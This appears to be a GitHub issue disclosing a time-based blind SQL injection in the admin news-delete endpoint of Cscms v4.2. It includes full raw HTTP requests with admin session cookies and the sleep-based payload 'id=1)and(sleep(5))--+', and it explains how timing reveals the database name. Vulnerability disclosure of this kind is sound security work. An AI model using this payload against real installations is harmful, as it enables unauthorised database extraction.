Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
SQL injection vulnerability exists in Cscms music portal system v4.2 (news_News.php_del)
Administrators need to add another news after logging in.the following data package is constructed
POST /admin.php/news/admin/news/save HTTP/1.1 Host: cscms.test Content-Length: 204 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://cscms.test Referer: http://cscms.test/admin.php/news/admin/news/edit Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=5apla1fdentnsdis6lbq25n548poo682 Connection: close cid=1&tid=0&reco=1&color=&name=1&addtime=ok&info=1&pic=&pic2=&tags=&hits=0&yhits=0&zhits=0&rhits=0&dhits=0&chits=0&user=&cion=0&vip=0&level=0&skins=&content=&file=&title=&keywords=&description=&id=0&yid=0
Constructing malicious packets to implement SQL injection
POST /admin.php/news/admin/news/del?yid=3 HTTP/1.1 Host: cscms.test Content-Length: 21 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://cscms.test Referer: http://cscms.test/admin.php/news/admin/news?yid=3 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=upaaled30l33aaosd7mdj746v41neu6a Connection: close id=1)and(sleep(5))--+
The payload executes and sleeps for 5 seconds
construct payload
Because the first letter of the background database name is "c", it sleeps for 5 seconds
Vulnerability source code News::del
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Details
SQL injection vulnerability exists in Cscms music portal system v4.2 (news_News.php_del)
Administrators need to add another news after logging in.the following data package is constructed
Constructing malicious packets to implement SQL injection
The payload executes and sleeps for 5 seconds
construct payload
Because the first letter of the background database name is "c", it sleeps for 5 seconds
Vulnerability source code News::del
The text was updated successfully, but these errors were encountered: